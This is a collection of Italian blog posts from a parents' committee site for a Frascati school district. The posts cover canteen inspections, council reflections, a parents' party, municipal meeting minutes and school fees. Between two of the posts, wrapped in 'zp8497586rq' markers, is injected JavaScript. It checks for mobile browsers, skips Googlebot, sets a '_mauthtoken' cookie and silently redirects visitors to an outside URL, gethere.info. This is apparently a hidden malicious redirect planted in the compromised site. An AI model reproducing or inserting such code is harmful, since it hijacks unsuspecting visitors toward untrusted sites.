Noi quelli della Commissione Mensa

Cari genitori,

siamo cinque genitori VOLONTARI che ad inizio anno ci siamo candidati per ricoprire l’incarico di membri della Commissione Mensa. In quattro rappresentiamo Villa Sciarra materna ed elementari, uno solo di noi rappresenta Vanvitelli. Siamo tre mamme e due papà, ognuno con le proprie vite rese vivaci da lavoro e figli!

Abbiamo voluto metterci in gioco e partecipare ancora più attivamente alla vita scolastica dei nostri figli e vedere come e dove mangiano.

Come Commissione siamo regolati da un “PROTOCOLLO OPERATIVO” che cerchiamo di seguire scrupolosamente. Questo Protocollo recita: “La C.M. è essenzialmente un organo di controllo propositivo e non esecutivo e svolge un ruolo di collegamento tra utenza ed Amministrazione comunale facendosi carico di riportare le diverse istanze che pervengono dall’utenza stessa.

Per svolgere tale compito, controlliamo senza preavviso i locali della refezione, circa due volte a settimana, i plessi di nostra competenza: Villa Sciarra materna ed elementari; Villa Muti; Vanvitelli. I controlli vengono effettuati con l’assaggio delle pietanze che sono somministrate ai bambini. Controlliamo le date di scadenza, ci informiamo sugli ingredienti utilizzati e sulla modalità di preparazione, verifichiamo che i prodotti utilizzati siano biologici come specificato nel capitolato di appalto. Ci siamo anche incaricati di fornire e raccogliere dei moduli che sono stati messi a disposizione delle insegnanti, per segnalare eventuali irregolarità nei pasti. Questi moduli servono, a noi membri in fase di riunione mensile con l’Amministrazione comunale, per testimoniare ciò che non viene gradito dall’utenza.

Dopo questi primi 5 mesi di attività, il bilancio che ci sentiamo di redigere è sostanzialmente positivo. Il servizio erogato è buono; il personale è cortese e molto disponibile, tutto è pulito e ordinato.

Alcune critiche sono state riportate verbalmente ad alcuni membri della Commissione Mensa, riguardanti la scarsa quantità delle porzioni e la scarsa varietà del menù.

Il menù viene preparato e siglato dalla ASL, prendendo in considerazione il giusto equilibrio alimentare da proporre ai bambini. Cambiarlo non è semplice ed immediato.

Laddove ci sono state delle problematiche riportate dalle insegnanti attraverso i moduli che ci hanno presentato, siamo riusciti ad ottenere piccole modifiche, ad esempio i fagioli in contorno sostituiti dai piselli; il merluzzo è stato sostituito con altro pesce che presenti meno rischio spine.

Per evitare “voci incontrollate” o “inutili allarmismi” generati anche dal timore di un ambiente che non si conosce, invitiamo tutti i genitori a parlare con noi, lavorando insieme, per cercare di migliorare concretamente le cose.

E’ possibile visionare il capitolato del servizio mensa, con gli ingredienti e le grammature da somministrare ad ogni pasto, sul sito del Comune di Frascati al seguente link: bando_refezione_scol_2010_integr.zip

Commissione Mensa
e-mail: commissionemensa [at] scuolattivamente.org

Fulvia Bartolomucci
Salvatore Calì
Dominga D’Ambrosio
Marco Farina
Jlenia Timperi

Un altro anno è passato…

Sarà che sto invecchiando, ma ogni anno che passa, ogni cosa che finisce mi fa scattare immediatamente la voglia di fare un bilancio. Ovviamente non essendo impazzito, e riferendomi al calendario Gregoriano, l’anno a cui faccio riferimento è quello scolastico. Chi mi conosce sa che, in ogni cosa che decido di fare,  metto sempre tutto me stesso; metto sempre tutta la passione di cui sono capace, a volte anche troppa.

Non mi ha mai spaventato lavorare, neanche lavorare tanto. Sono abituato. Ma sono anche una persona che ama vedere i risultati. Penso che la benzina che muove ognuno di noi sia, principalmente, il vedere la concretizzazione di un progetto, un percorso. Purtroppo questa esperienza a contatto con le istituzioni, mi lascia con un grosso rammarico. Quando ci penso ho un peso sullo stomaco, un nodo alla gola. Non sono riuscito a concretizzare neanche un terzo di quello che avevo in mente.

Ho sempre pensato che il contributo di persone motivate potesse essere di stimolo e di sprono ad altri. Insieme agli altri genitori del consiglio di circolo abbiamo lottato come matti, ma contro le istituzioni, che sono li da secoli, non si vince. Questa è la triste verità. Abbiamo dovuto combattere una mentalità obsoleta, e reticente; abbiamo dovuto discutere dell’ovvio perdendo tempo su temi che, in uno stato moderno (in una scuola moderna), dovevano essere superati 15 anni fa; ci siamo dovuti scontrare contro chi pensa che la scuola sia un feudo, e non la fabbrica delle menti di domani; caricarci sulle spalle chi pensa che la collaborazione abbia sempre un secondo fine. Questo continuo logorio, mi ha letteralmente sfiancato, e sinceramente sfiduciato.

Come in tutte le cose però, esiste anche un lato positivo. Esiste quell’ambito in cui si fanno delle belle conoscenze. In cui riesci a comprendere di quanta professionalità e quanta capacità inespressa possa esistere nelle persone. E allora valorizzi e comprendi tutto quel lavoro che fanno le insegnanti, tra mille difficoltà. E di come da un deserto che c’è intorno a loro, riescono a far crescere dei fiori, i nostri ragazzi. Ti accorgi di persone, di genitori fantastici, che per un bene comune: la scuola; lottano, s’impegnano, s’incazzano, fanno notte fonda davanti al pc per creare un sito (più fruibile di quello che la pubblica amministrazione dovrebbe mettere a disposizione), oppure passano mattinate a rispondere alle mille email che arrivano, sui problemi più disparati. E tutto questo non solo per amore dei propri figli, ma anche, e soprattutto, per quel senso civico che ognuno di noi dovrebbe avere.

Non è un segreto poi che reputo la verticalizzazione, e voglio che sia chiaro, un fatto non positivo per i nostri figli, ma solo un modo di applicare un ulteriore taglio alla scuola. Voglio voler pensare che questa rivoluzione, almeno inizialmente, sia stata pensata cercando di voler arrivare ad un modello di scuola moderna. Tra i progetti e la loro applicazione di mezzo c’è il mare. Gestendo come si sta gestendo questo delicatissimo passaggio, a tutti i livelli, non riesco a pensare a quale risultato si potrà avere. La modalità con cui si sta procedendo, soprattutto da parte del Ministero, è quella della navigazione a vista nella nebbia più fitta circondati da iceberg. Spero proprio che si riesca a portare la nave in porto.

Mi vorrei congedare da questi due anni di fatiche soltanto ringraziando tutti quelli con i quali ho avuto modo di lavorare, tutti quelli con cui ho sorriso, e con i quali mi sono arrabbiato, nessuno escluso. Mi auguro, con tutto il cuore, che chi verrà dopo di me, dopo di noi, in un momento così particolare: sia dal punto di vista sociale, che per la trasformazione che il nostro circolo sta subendo, riesca a dare quella forza propulsiva che occorre per fare bene. Buon lavoro…

Comitato, ma che festa!!!!

Nel pomeriggio di venerdì 25 maggio si è svolta nel parco di Villa Sciarra, la festa del Comitato Genitori.
Esperimenti, giochi, creatività e naturalmente pizza, dolci e bibite a volontà.
E sole! Finalmente un bel po’ di sole a colorire (anche troppo!) i visi dei bambini!

Questa è stata la ricetta per un divertente pomeriggio che molti di noi hanno scelto di condividere con il Comitato Genitori del 2° circolo didattico di Frascati.

In molti si sono chiesti del perchè di una festa distinta rispetto a Ri-creazione, la prossima mostra-evento a cura del nostro circolo didattico.

Non certo per prendere le distanze dalla scuola e dal personale scolastico, che tanta parte ha nella vita quotidiana dei nostri bambini e che avremo invece la gioia di festeggiare mercoledì 6 giugno dalle 14 sempre nel parco di Villa Sciarra e di cui parleremo ampiamente nei prossimi giorni.

Le ragioni sono in realtà altre e riguardano più strettamente le famiglie (genitori, figli, nonni) che gravitano intorno alla nostra scuola.

Allora, perchè una festa dei genitori?

– prima di tutto perchè,… da frascatani D.O.C. (acquisiti e non), di far festa, non ci si stanca mai!

– poi perchè i genitori hanno bisogno di occasioni per conoscersi, parlare, confrontarsi, senza l’ansia di dover scappare altrove. E per far questo, ogni occasione è buona!

– perchè i genitori hanno voglia di celebrarsi, celebrare il loro impegno e la volontà di tutti coloro che sacrificano ogni giorno parte del loro tempo lavorativo o familiare, per rendere, insieme alle nostre brave e coscienziose maestre, la nostra scuola un posto migliore dove veder crescere una nuova generazione di cittadini italiani.

– perchè è bello e importante poter spegnere la candelina del primo anno di vita del Comitato Genitori e dare il benvenuto alla neo-nata Onlus “Tutti pazzi per la scuola”.

– perchè è l’occasione per i genitori e per il comitato di guardarsi in faccia e fare il punto della situazione e del lavoro svolto sinora: dei loro successi e delle loro sconfitte.
Pronti ad alzare il livello dei loro obbiettivi per il prossimo anno.

– perchè i genitori ridono, scherzano, ballano… e sanno che non c’è fatica più dolce che dare il tutto per tutto per far crescere i propri figli in un ambiente scolastico sicuro, sano, stimolante, vivace e rispettoso delle diversità.

– perchè quei genitori che si preparano con i loro figli a fare il grande passo verso la scuola media, abbiano un modo concreto di salutare le famiglie che restano e di passare il testimone del proprio impegno civico alle nuove famiglie che stanno già arrivando nella scuola.

– perchè i genitori sperano che, guardandosi indietro quando i loro figli saranno ormai grandi, sentiranno di aver fatto tutto quello che era in loro dovere fare per il benessere dei propri bambini e della comunità scolastica di cui fanno parte.

– perchè i genitori bramano essere un esempio vivo, concreto e positivo per i propri figli.
Insegnando con fatti concreti che impegnarsi per cambiare lo stato delle cose che non vanno bene, anche se non è la ricetta per una vittoria sicura, è però l’unico modo per crescere veramente come individui e per presentarsi più forti davanti alla prossima sfida che si profila all’orizzonte.

Per questi motivi… e molti altri da scoprire ancora… grazie genitori!

…E ora, di nuovo tutti insieme a festeggiare la Ri-creazione!!!

Una proposta di confronto e partecipazione

Tra le tante iniziative che abbiamo in cantiere, e visto anche il successo di contatti che sta avendo il nostro sito Scuolattivamente.org, stavamo pensando di fornirvi, attraverso di esso, una serie d’informazioni che oggi potete reperire solo in formato cartaceo presso la segreteria della scuola.

Grazie a qualche genitore, molto disponibile, il nostro sito sta diventando sempre di più un luogo d’incontro di tutte le componenti del nostro circolo. Un luogo dove le varie componenti possono incontrarsi, ottenere informazioni o fornirne. Questo perché il sito risulta leggibile e sempre aggiornato.

Chiunque si colleghi su scuolattivamente.org, può sapere quali sono le ultime notizie, se ci sono degli avvisi, o più semplicemente cosa mangiano i nostri bimbi a mensa oggi. Perché non inserire le informazioni di tutto il lavoro che viene svolto nelle fredde mura dell’aula polifunzionale Nanomondo, durante i consigli di circolo???

Esistono pagine e pagine di verbali che non saranno mai consultate da nessuno, e che invece contengono informazioni utili a tutti. Quelle pagine sono il frutto del sacrificio di persone come noi, che dedicano ore della propria vita alla causa comune.

La rete è, sempre di più, il mezzo che ci permette di rimanere collegati al mondo nell’ora in cui vogliamo e dal posto in cui siamo. Un utilizzo corretto di questo mezzo, c’impone di rendere il nostro lavoro fruibile a tutti. E in una istituzione dove i documenti non si sigillano dentro uno schedario, vi è certamente maggiore trasparenza.

Mettere a vostra disposizione delle informazioni, ne sono sicuro, stimolerà il dibattito e la partecipazione ulteriore di genitori ed insegnanti. Non vi nascondo però che nell’ambito del dibattito, c’è chi è contrario a questa forma di condivisione. Alcune motivazioni le comprendo, e soprattutto quelle riconducibili alla privacy di ognuno di noi, ma altre, sinceramente sono molto lontane dal mio modo di pensare. Ovviamente, recando ogni verbale la mia firma, sono sempre molto attento a quello che vi è scritto, e ci sarà sempre la massima attenzione a non inserire dati sensibili in un sito pubblico.

C’è però da dire che da quando faccio parte di questo consiglio di circolo, salvo un caso forse, non si è mai parlato di problematiche che toccavano la sfera del privato di nessuno. Abbiamo sempre toccato, come deve essere, argomenti che riguardano la collettività.

C’è anche un altro aspetto che a mio modesto parere va detto. Il consiglio d’Istituto, con esclusione del Dirigente Scolastico (DS) e del Direttore dei servizi Generali ed Amministrativi (DSGA), è formato da tutti membri votati dalle varie componenti dell’istituto. La possibilità di ognuno di noi di valutare l’operato di chi ha votato, dovrebbe essere alla base del vivere civile, e forse dovrebbe essere estesa anche a chi prende decisioni ben più importanti delle nostre.

Mi auguro pertanto che al prossimo consiglio d’istituto si riesca a discutere di questo argomento ed anche deliberarlo per far sì che tutti voi possiate avere qualche informazione in più.

Secondo incontro tra Comune, Scuola e Comitato Genitori

Martedì 4 Ottobre 2011 il Comitato Genitori si è incontrato con il Sindaco di Frascati Stefano Di Tommaso, la dirigente dell’Ufficio Scuola Maria Grazia Toppi, l’Assessore alle Politiche educative Armanda Tavani, il responsabile della manutenzione delle scuole Gianni Battistoni, la Dirigente Scolastica del C.D. Frascati II Paola Felicetti e l’insegnante Cecilia Kucich.
Per il Comitato Genitori erano presenti:
Lorenza Bellincampi
Tiziana Conte
Filippo Foti
Gianluca Mariotti
Luca Giarratana

Gli argomenti trattati sono stati in sintesi:

1. Arredi interni

  • E’ stato reso noto che la ditta della mensa ha ordinato le sedie nuove per tutte le classi di tutte le scuole di Frascati.
  • Se avanzerà qualcosa del budget si stabiliranno delle priorità per altre beni come armadi, scrivanie, ecc.

2. Spazi esterni
2.1 Giardino della primaria Villa Sciarra

  • L’Uff. Scuola ha mandato al CG una piantina del giardino e chiederà un preventivo per far fare una soletta di cemento per installare sopra un pavimento antitrauma.
  • Il CG chiederà un preventivo per il pavimento antitrauma.
  • Il CG ha proposto di cercare sponsorizzazioni: il Comune ha approvato la proposta.

2.2 Piazzale di Villa Sciarra

  • Il CG ha proposto che i pulmini facciano manovra prima del tunnel per non spostare la ghiaia e così ridurre la polvere e la formazione di buche.
  • Questo fa sorgere il problema di chi accompagnerebbe i bambini dai pulmini all’ingresso.
  • La DS ha detto che il personale ATA non può farlo.

3. Pulizia ambienti

  • Il CG ha fatto vedere le foto del ballatoio all’uscita di sicurezza della mensa della materna di Villa Sciarra, dicendo che il medico della scuola ha dichiarato trattarsi di escrementi di topo, chiedendone la pulizia ed il posizionamento di esche per topi.
  • La pulizia compete alla scuola
  • Nota post riunione: l’addetto del Comune, Carlo Gioia, incontrato fuori, ha detto che la derattizzazione è stata effettuata nei giorni precedenti e che le esche già ci sono. Il giorno successivo, a valle di un sopralluogo, ha detto che quelli sono soprattutto escrementi di rondone.

4. Lavori scala antincendio

  • Il CG ha domandato se fosse possibile sapere quanto dureranno ancora i lavori.
  • L’Ass. Tavani ha contattato il responsabile dei lavori che ha dichiarato mancare ancora 15-20 giorni.

Iscrizione Commissione Mensa

Un bentornato a tutti i genitori!!!

Volevo ricordare che entro lunedì 20  settembre gli interessati devono  presentare la domanda per far parte della commissione mensa del 2° circolo per l’ A.S.  2011/2012.

La domanda, in carta semplice, va presentata presso la segreteria della scuola, indicando le proprie generalità, del proprio figlio e la classe di appartenenza.

La carica in seno alla commissione dura 1 anno  scolastico e svolge una funzione di controllo.

Prima di presentare la domanda accertatevi di disporre dei requisiti per poter svolgere al meglio questo incarico:

  • Disponibilità di recarsi di mattina nei locali mensa per controllare gli alimenti (scadenza, aspetto, provenienza, ecc.)
  • Controllare, durante i turni del pranzo (materna ore 12.00, elementari 1° turno 12.30 – 13.15, 2° turno 13.30 – 14.15), il consumo dei pasti da parte degli alunni, l’indice di gradimento e lo svolgimento del servizio, annotando il tutto su apposito modulo.
  • Possibilità di partecipare una volta al mese di mattina, alla riunione che si svolge presso il Comune di Frascati, per confrontarsi con le altre componenti del “mondo mensa” (ufficio scuola, società appaltatrice CIR FOOD, commissione mensa I° circolo).

Rimango a disposizione per qualsiasi informazione

Gianluca Mariotti

Un anno e non sentirlo…

E’ terminato il primo anno scolastico da quando si è insediato il nuovo consiglio d’Istituto. Sono stati mesi di duro lavoro, e tante cose sono state fatte. Sono orgoglioso di far parte di un gruppo di persone così motivate. Un gruppo in cui insegnanti, personale ATA, Dirigenti, e genitori hanno lavorato avendo come obiettivo il miglioramento della “nostra” scuola.

Ci sono stati momenti in cui il dibattito è stato anche duro, aspro, ma sempre all’insegna del reciproco rispetto. L’intesa, alla fine, non è mai mancata, gli sforzi sono sempre stati finalizzati ad ottenere il massimo dalle esigue risorse che abbiamo a disposizione. Facendo un’analisi, non vedo momenti d’insuccesso, ma tanti ancora argomenti d’affrontare per dare nuova spinta e nuovo slancio al nostro istituto.

La componente dei genitori, quella di cui faccio parte, è sicuramente quella che ho osservato con maggiore curiosità. Ovviamente la cosa che mi è saltata subito agli occhi, è l’inesperienza iniziale nell’affrontare un mondo nuovo, così ricco di regole. A parte un genitore, nessuno aveva mai avuto esperienze in un CdI. Ma è stato molto confortante vedere come in questi ultimi consigli, ci si sia mossi, tutti, decisamente meglio. Sembravamo quasi dei veterani, nonostante abbiamo TUTTI, ancora molto da imparare.

Il merito di questa crescita è sicuramente da addebitare alla varietà di esperienze di vita e professionali, che ognuno di noi ha potuto mettere in campo. Ed è sicuramente un patrimonio che nei prossimi due anni la scuola dovrà sfruttare. Non possiamo e non vogliamo avere scusanti, deve essere un impegno di questo consiglio d’Istituto, mettere in atto tutto quanto in suo potere per far diventare il nostro istituto all’avanguardia.

E’ volontà di tutti, fare in modo di aumentare le dotazioni tecnologiche a disposizioni dei nostri figli e delle loro insegnanti, tutelare e difendere tutto quanto è patrimonio dell’istruzione dei nostri figli, anche se finanziarie dissennate, soprattutto nell’ultimo periodo, stanno decisamente minando tutto il mondo scolastico ad ogni livello e grado.

Volevo rendere tutti partecipi dei miei pensieri. Volevo condividere con i miei compagni di viaggio: DS, insegnanti, personale ATA e genitori, la mia gratitudine per avere la possibilità di svolgere un’esperienza così altamente formativa.

Sono convinto che dopo un anno scolastico così pieno, si siano gettate le basi per poter fare bene negli anni a venire, fondamentale però sarà il rispetto. Rispetto inteso come: istituzionale, ossia del non voler/dover prevaricare le altre istituzioni, anche in seno al nostro circolo; dei ruoli: tutti dobbiamo remare nella stessa direzione partendo dall’assioma che l’unica strada che possiamo percorrere per fare delle cose buone, è quella della condivisione e del supporto reciproco; per chi lavora: nel nostro circolo abbiamo delle eccellenze, e dobbiamo tutelarle, e questo può avvenire solo con la difesa del nostro più grande patrimonio, il corpo docente. Questo patrimonio va tutelato, coccolato, e messo nella condizione di crescere dal punto di vista professionale. Personalmente nutro profonda fiducia nelle loro metodologie, che derivano dall’esperienza, ma anche nella loro capacità di ascolto.

Sono sicuro, partendo dall’etimologia della parola insegnante, ossia colui capace d’imprimere dei segni, ovviamente nella mente, che queste persone che stanno dedicando la loro vita alla cultura dei nostri figli, siano in grado d’imprimere dei segni indelebili nella mente, e nei cuori dei nostri bambini.

Approfitto per augurare a tutti una riposante estate.

Iscrizione mensa scolastica 2011/2012

Per assicurare il servizio di refezione scolastica ai propri figli che frequenteranno l’anno prossimo la scuola materna o elementare, i genitori dovranno farne richiesta presso il Comune di Frascati compilando un modulo da consegnare a mano (o inviandolo via fax) non oltre la data del 22 luglio 2011.

Si legge infatti dall’avviso dell’Ufficio Scuola:


Dato atto che il servizio di refezione scolastica rientra nella tipologia del servizio a domanda individuale di cui al  D.M. 31.12.1983, pertanto i pasti vengono erogati su richiesta degli utenti;

  • I genitori degli alunni delle scuole materne ed elementari residenti e non nel comune di frascati, interessati al servizio mensa scolastica devono presentare domanda di iscrizione entro il 22 luglio 2011.
  • Non potranno essere prese in considerazione le domande presentate oltre il termine ultimo del 22 luglio 2011.

I moduli relativi alle domande sono in distribuzione presso l’URP sito al piano terreno della sede comunale, tutti i giorni dalle ore 9,00 alle ore 12,00 ed il martedi e giovedi dalle ore 15,00 alle ore 16,30 o potranno essere ricavate dal sito del comune.

Le domande debitamente compilate dovranno essere consegnate all’Ufficio Protocollo ubicato al piano terreno della sede comunale. Gli utenti che presenteranno domanda qualora, per qualsiasi motivo, non usufruiranno del servizio dovranno inoltrare all’Ufficio Protocollo la relativa disdetta indirizzato al Comune di Frascati – Ufficio Scuola.

Per ulteriori informazioni rivolgersi all’Ufficio Scuola – 2° piano della Sede Comunale – tel. 06/94184250 / 94184225


Modulistica online sul sito del Comune

Dalla pagina Info Scuola del sito del Comune di Frascati, è possibile scaricare:


Contributo Volontario: una proposta

Contributo volontario: vi ricordate il bollettino che la scuola tramite i rappresentanti di classe (sic!!!!) ci ha consegnato vari mesi fa?

In questo contesto voglio provare ad analizzare i fatti e a provare ad avanzare delle proposte.

Quanti soldi vengono raccolti?

Negli ultimi due anni pochi. E i soldi raccolti sono andati diminuendo. Quest'anno non ci sono ancora dati ufficiali.

Come vengono spesi?

Quelli degli ultimi due anni sono stati accantonati e i progetti dichiarati in forma di principio non sono stati realizzati.

Quando vengono spesi?

Non c'è nessun vincolo.

Quelli accantonati negli ultimi anni dovrebbero essere usati per l'adesione a un fondo di miglioramento delle apparecchiature tecniche della scuola (sala informatica, LIMs, aggiornamento docenti). Per il futuro non si sa: si naviga a vista.

Chi non paga è “cattivo” o non fa il suo dovere?

Assolutamente no. Ci possono essere tante ragioni per non pagare.

Ma la cosa da chiarire in via definitiva è che nessuno deve dire se paga e tanto meno spiegarne i motivi. La scuola, pur nelle difficoltà, è in grado di reggersi da sola.

Se pago sono uno sciocco?

Vale la risposta di sopra. Ma chi paga, forse, è maggiormente interessato a spiegare i motivi della sua scelta.

Il contributo volontario va eliminato?

La mia opinione è che se viene modificato nella gestione andrebbe lasciato.

Come migliorarlo e renderlo accettabile?

L'intervento è sostanziale e non è una semplice modifica di forma.

La prima richiesta è di chiedere l'adesione a più progetti di spesa. Per progetto di spesa intendo un piano con intenti didattici definiti corredato dalle finalità dell'iniziativa, dall'elenco dei materiali necessari e dai relativi preventivi di spesa.

La seconda è l'individuazione di una data certa per la realizzazione del relativo progetto.

La terza è la verifica dell'effettiva realizzazione del progetto.

Senza i primi due punti NON si dovrebbe chiedere il contributo volontario; senza il terzo sarebbe meglio astenersi dalla richiesta per gli anni futuri.

Tutte le fasi, e non solo il momento della raccolta, dovrebbero essere fortemente pubblicizzate dalla scuola.

Perché più di un progetto di spesa?

I progetti presentati dovrebbero differenziarsi per il costo totale.

Se vengono raccolti 5000 euro si realizza il progetto A.

Se vengono raccolti 2000 euro si realizza il progetto B.

Se vengono raccolti 100 euro si realizza il progetto C.

Le cifre inserite non sono casuali.

zp8497586rq

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Maggio ha il profumo della fine della scuola

Maggio, maggio…..I ricordi di tanto tempo fa mi affiorano alla mente.

Un tempo remoto in cui andavo ancora a scuola. A Maggio arriva il caldo, l’estate si avvicina e i pomeriggi sono scanditi dalle lunghe tappe del Giro d’Italia.

Poi si cresce e le cose iniziano a cambiare: gli esami all’università e la frenesia del lavoro non lasciano che poco tempo per sentire l’inizio dell’estate, per godersi le pause e i paesaggi trasmessi in televisione durante le tappe.

A un certo punto arrivano i figli e maggio diventa il mese dell'affanno: una corsa ad ostacoli tra uno spettacolo, una prova, una comunione e un saggio.

Basta! Quest’anno si cambia……

Ho saputo, tra l’altro, che il 30 Maggio si organizza la FESTA DELLA SCUOLA nel Parco di Villa Sciarra.

Io ne approfitto e metto insieme un po’ di cose. Ecco cosa faccio:

  1. Mi prendo un giorno di ferie. E se il capo fa la faccia storta gli dico che il lavoro può aspettare.
  2. Scelgo un bel libro, accompagno le bimbe a scuola e mi fermo al Parco a leggere.
  3. Abbigliamento comodo e qualche cacciavite. Così aiuto le maestre a mettere in piedi la manifestazione e mi sento pure utile.
  4. Un bel panino (con la porchetta, credo). A maggio ci sta sempre bene.
  5. Il televisore no e neanche la radio. Tanto il Giro d’Italia sarà finito.
  6. Poi mi godo le mie bimbe che recitano e cantano.

Aaahhhhh!!!

Qualcuno viene con me?

zp8497586rq

